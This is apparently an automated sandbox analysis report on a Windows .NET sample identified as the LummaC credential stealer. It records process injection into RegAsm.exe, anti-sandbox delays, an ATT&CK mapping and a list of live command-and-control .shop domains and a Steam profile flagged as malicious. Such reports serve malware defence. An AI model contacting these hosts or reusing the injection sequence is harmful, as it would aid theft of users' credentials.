    Source: a7HdB2dU5P.exe, 00000000.00000002.1693049512.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs a7HdB2dU5P.exe
    Source: a7HdB2dU5P.exe, 00000000.00000000.1678966871.000000000062E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVQP.exe< vs a7HdB2dU5P.exe
    Source: a7HdB2dU5P.exeBinary or memory string: OriginalFilenameVQP.exe< vs a7HdB2dU5P.exe
    Source: a7HdB2dU5P.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: a7HdB2dU5P.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@4/2@11/7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004381AA CoCreateInstance,2_2_004381AA
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a7HdB2dU5P.exe.logJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6456:120:WilError_03
    Source: a7HdB2dU5P.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: a7HdB2dU5P.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: a7HdB2dU5P.exeReversingLabs: Detection: 47%
    Source: unknownProcess created: C:\Users\user\Desktop\a7HdB2dU5P.exe "C:\Users\user\Desktop\a7HdB2dU5P.exe"
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: a7HdB2dU5P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: a7HdB2dU5P.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: a7HdB2dU5P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00437333 push 04EC839Eh; mov dword ptr [esp], edi2_2_0043733A
    Source: a7HdB2dU5P.exeStatic PE information: section name: .text entropy: 7.995621110986315
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory allocated: C60000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory allocated: 48C0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe TID: 6544Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5968Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: RegAsm.exe, 00000002.00000002.1795323805.0000000001265000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00447560 LdrInitializeThunk,2_2_00447560
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Allocates memory in foreign processes
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
    Contains functionality to inject code into remote processes
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeCode function: 0_2_028C2145 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_028C2145
    Injects a PE file into a foreign processes
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
    LummaC encrypted strings found
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: reinforcenh.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stogeneratmns.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fragnantbui.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: drawzhotdog.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: vozmeatillu.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: offensivedzvju.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ghostreedmnu.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: gutterydhowi.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: lootebarrkeyn.shop
    Writes to foreign memory regions
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000Jump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000Jump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F4E008Jump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeQueries volume information: C:\Users\user\Desktop\a7HdB2dU5P.exe VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    PowerShell    		1
    DLL Side-Loading    		411
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Disable or Modify Tools    		LSASS Memory31
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol2
    Clipboard Data    		1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
    Virtualization/Sandbox Evasion    		Security Account Manager12
    System Information Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
    Process Injection    		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Deobfuscate/Decode Files or Information    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
    Obfuscated Files or Information    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
    Software Packing    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    a7HdB2dU5P.exe47%ReversingLabsByteCode-MSIL.Trojan.Zilla

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://player.vimeo.com0%URL Reputationsafe
    https://community.akamai.steamstatic.com/0%URL Reputationsafe
    https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    https://recaptcha.net/recaptcha/;0%URL Reputationsafe
    https://medal.tv0%URL Reputationsafe
    https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://login.steampowered.com/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://steam.tv/0%URL Reputationsafe
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
    https://drawzhotdog.shop/api100%Avira URL Cloudmalware
    https://gutterydhowi.shop/api100%Avira URL Cloudmalware
    stogeneratmns.shop100%Avira URL Cloudmalware
    https://performenj.shop/vo100%Avira URL Cloudmalware
    https://offensivedzvju.shop/100%Avira URL Cloudmalware
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    lootebarrkeyn.shop100%Avira URL Cloudmalware
    reinforcenh.shop100%Avira URL Cloudmalware
    https://performenj.shop/apiG100%Avira URL Cloudmalware
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://www.youtube.com0%Avira URL Cloudsafe
    https://lv.queniujq.cn0%URL Reputationsafe
    https://drawzhotdog.shop/100%Avira URL Cloudmalware
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://www.google.com0%Avira URL Cloudsafe
    https://reinforcenh.shop/api2100%Avira URL Cloudmalware
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP0%Avira URL Cloudsafe
    https://steamcommunity.com/K0%Avira URL Cloudsafe
    https://s.ytimg.com;0%Avira URL Cloudsafe
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a0%Avira URL Cloudsafe
    ghostreedmnu.shop100%Avira URL Cloudmalware
    https://reinforcenh.shop/api100%Avira URL Cloudmalware
    https://reinforcenh.shop/100%Avira URL Cloudmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://performenj.shop/100%Avira URL Cloudmalware
    https://sketchfab.com0%Avira URL Cloudsafe
    https://vozmeatillu.shop/api100%Avira URL Cloudmalware
    https://stogeneratmns.shop/api100%Avira URL Cloudmalware
    https://vozmeatillu.shop/Y100%Avira URL Cloudmalware
    https://www.youtube.com/0%Avira URL Cloudsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%Avira URL Cloudsafe
    https://checkout.steampowered.com/0%URL Reputationsafe
    http://127.0.0.1:270600%Avira URL Cloudsafe
    https://help.steampowered.com/0%URL Reputationsafe
    https://api.steampowered.com/0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    gutterydhowi.shop100%Avira URL Cloudmalware
    fragnantbui.shop100%Avira URL Cloudmalware
    https://ghostreedmnu.shop/api100%Avira URL Cloudmalware
    https://fragnantbui.shop/api100%Avira URL Cloudmalware
    https://store.steampowered.com/;0%URL Reputationsafe
    https://stogeneratmns.shop/apiD100%Avira URL Cloudmalware
    https://offensivedzvju.shop/api100%Avira URL Cloudmalware
    https://www.google.com/recaptcha/0%Avira URL Cloudsafe
    https://performenj.shop/G100%Avira URL Cloudmalware
    offensivedzvju.shop100%Avira URL Cloudmalware
    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg0%Avira URL Cloudsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware
    https://performenj.shop/api100%Avira URL Cloudmalware
    drawzhotdog.shop100%Avira URL Cloudmalware
    https://steamcommunity.com/0%Avira URL Cloudsafe
    vozmeatillu.shop100%Avira URL Cloudmalware
    https://steamcommunity.com/x0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    fragnantbui.shop
    		188.114.97.3
    		truetrue
      		unknown
      performenj.shop
      		172.67.189.2
      		truetrue
        		unknown
        gutterydhowi.shop
        		104.21.4.136
        		truetrue
          		unknown
          steamcommunity.com
          		104.102.49.254
          		truefalse
            		unknown
            offensivedzvju.shop
            		188.114.96.3
            		truetrue
              		unknown
              stogeneratmns.shop
              		188.114.96.3
              		truetrue
                		unknown
                reinforcenh.shop
                		104.21.77.130
                		truetrue
                  		unknown
                  drawzhotdog.shop
                  		104.21.58.182
                  		truetrue
                    		unknown
                    ghostreedmnu.shop
                    		188.114.97.3
                    		truetrue
                      		unknown
                      vozmeatillu.shop
                      		188.114.96.3
                      		truetrue
                        		unknown
                        lootebarrkeyn.shop
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://drawzhotdog.shop/apitrue
                          • Avira URL Cloud: malware
                          		unknown
                          lootebarrkeyn.shoptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://gutterydhowi.shop/apitrue
                          • Avira URL Cloud: malware
                          		unknown
                          reinforcenh.shoptrue
                          • Avira URL Cloud: malware
                          		unknown
                          stogeneratmns.shoptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://reinforcenh.shop/apitrue
                          • Avira URL Cloud: malware
                          		unknown
                          ghostreedmnu.shoptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://steamcommunity.com/profiles/76561199724331900true
                          • URL Reputation: malware
                          		unknown
                          https://vozmeatillu.shop/apitrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://stogeneratmns.shop/apitrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://ghostreedmnu.shop/apitrue
                          • Avira URL Cloud: malware
                          		unknown
                          fragnantbui.shoptrue
                          • Avira URL Cloud: malware
                          		unknown
                          gutterydhowi.shoptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://offensivedzvju.shop/apitrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://fragnantbui.shop/apitrue
                          • Avira URL Cloud: malware
                          		unknown
                          offensivedzvju.shoptrue
                          • Avira URL Cloud: malware
                          		unknown
                          drawzhotdog.shoptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://performenj.shop/apitrue
                          • Avira URL Cloud: malware
                          		unknown
                          vozmeatillu.shoptrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://player.vimeo.comRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://performenj.shop/voRegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://community.akamai.steamstatic.com/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.gstatic.cn/recaptcha/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://recaptcha.net/recaptcha/;RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://offensivedzvju.shop/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://performenj.shop/apiGRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.youtube.comRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&aRegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.comRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://medal.tvRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://broadcast.st.dl.eccdnx.comRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://reinforcenh.shop/RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://steamcommunity.com/KRegAsm.exe, 00000002.00000002.1795323805.0000000001276000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reinforcenh.shop/api2RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://s.ytimg.com;RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://login.steampowered.com/RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://store.steampowered.com/legal/RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
